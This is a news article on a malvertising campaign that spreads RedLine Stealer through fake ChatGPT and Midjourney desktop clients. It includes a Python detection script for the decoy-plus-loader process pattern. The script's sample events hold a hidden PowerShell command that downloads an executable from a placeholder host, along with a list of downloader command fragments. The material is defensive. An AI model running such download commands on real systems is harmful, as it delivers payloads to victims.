ChatGPT, Midjourney, where the hell is the native client for Windows?!
RedLine Stealer in conjunction with BATLOADER successfully infects the computers of users who just want a little convenience.
Attackers are using fake advertisements in Google search to spread the RedLine Stealer data thief. The targets of the attack are users looking for generative artificial intelligence services such as ChatGPT and Midjourney, eSentire reports.
ChatGPT and Midjourney are popular generative AI services that don’t have their own native apps. All interaction with ChatGPT takes place through the web interface, and with Midjourney through Discord. These restrictions force users to look for workarounds, which often lead to downloading and installing malware.
Just yesterday we wrote about dozens of fraudulent ChatGPT apps for Android and iOS which, if they provide the promised functionality at all, do it very badly, while at the same time fleecing users with a very expensive subscription.
As for desktop clients for ChatGPT and Midjourney, in the malicious campaign reviewed by eSentire, once the promised program is downloaded to the victim’s computer it opens, as a distraction, a pop-up window via Microsoft Edge WebView2 that loads the legitimate ChatGPT or Midjourney address (“chat.openai.com” or “midjourney.com”). In parallel, however, the malicious BATLOADER loader runs, which in turn downloads and launches RedLine Stealer from a server controlled by the attackers.
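The decoy-plus-loader pattern described above gives defenders something to correlate in endpoint telemetry: one parent process that spawns both a WebView2 host (the legitimate-looking window) and a shell child that fetches something from the network. The following is an added detection example, not code from the article or from eSentire; the process-creation events, file names, PIDs and timestamps are constructed for illustration, and it assumes the WebView2 runtime process `msedgewebview2.exe` appears as a child of the host application.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Sysmon-style process-creation events (ts, pid, ppid, image, cmd).
# Names and values are invented for illustration, not indicators from the report.
SAMPLE_EVENTS = [
    {"ts": "2023-05-20T10:00:00", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    # hypothetical fake "desktop client" fetched from a search ad
    {"ts": "2023-05-20T10:00:05", "pid": 200, "ppid": 100, "image": "ChatGPT-Setup.exe", "cmd": "ChatGPT-Setup.exe"},
    # decoy: WebView2 host window showing the legitimate site
    {"ts": "2023-05-20T10:00:06", "pid": 201, "ppid": 200, "image": "msedgewebview2.exe", "cmd": "msedgewebview2.exe --embedded-browser-webview=1"},
    # loader stage: shell child pulling a second stage from a remote host
    {"ts": "2023-05-20T10:00:08", "pid": 202, "ppid": 200, "image": "cmd.exe", "cmd": "cmd.exe /c powershell -w hidden Invoke-WebRequest http://example.invalid/s.exe -OutFile s.exe"},
    # benign: a legitimate app that embeds WebView2 with no downloader sibling
    {"ts": "2023-05-20T10:05:00", "pid": 300, "ppid": 100, "image": "LegitApp.exe", "cmd": "LegitApp.exe"},
    {"ts": "2023-05-20T10:05:01", "pid": 301, "ppid": 300, "image": "msedgewebview2.exe", "cmd": "msedgewebview2.exe --embedded-browser-webview=1"},
]

DECOY_IMAGE = "msedgewebview2.exe"
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# command-line fragments typical of living-off-the-land downloaders
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadfile", "downloadstring",
                    "curl ", "bitsadmin", "certutil", "start-bitstransfer")


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_decoy_loader_pairs(events, window_s=60):
    """Return (parent_pid, decoy_pid, loader_pid) for each parent that spawns a
    WebView2 decoy and a downloading shell within window_s seconds of each other."""
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e["ppid"]].append(e)
    hits = []
    for ppid, children in by_parent.items():
        decoys = [c for c in children if c["image"].lower() == DECOY_IMAGE]
        loaders = [c for c in children
                   if c["image"].lower() in SHELL_IMAGES
                   and any(m in c["cmd"].lower() for m in DOWNLOAD_MARKERS)]
        for d in decoys:
            for l in loaders:
                if abs((_ts(d) - _ts(l)).total_seconds()) <= window_s:
                    hits.append((ppid, d["pid"], l["pid"]))
    return hits


if __name__ == "__main__":
    for ppid, dpid, lpid in find_decoy_loader_pairs(SAMPLE_EVENTS):
        print(f"parent {ppid}: WebView2 decoy {dpid} alongside downloader {lpid}")
```

The benign WebView2 host (PID 300) is not flagged because it has no downloading shell sibling; only the constructed installer (PID 200) matches.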
RedLine Stealer is a data thief capable of stealing personal data, passwords, cookies, and other information from an infected computer. Interestingly, last week another cybersecurity company, Trend Micro, also recorded cases of fake ChatGPT and Midjourney clients being distributed through fraudulent advertisements.
This is not the first time that BATLOADER operators have exploited user interest in AI to spread malware. In March 2023, eSentire reported similar attacks that used ChatGPT lures to install the Vidar Stealer and Ursnif infostealers.
eSentire also noted that abuse of Google search ads has decreased since the start of 2023, suggesting that Google is taking active steps to crack down on fraudsters.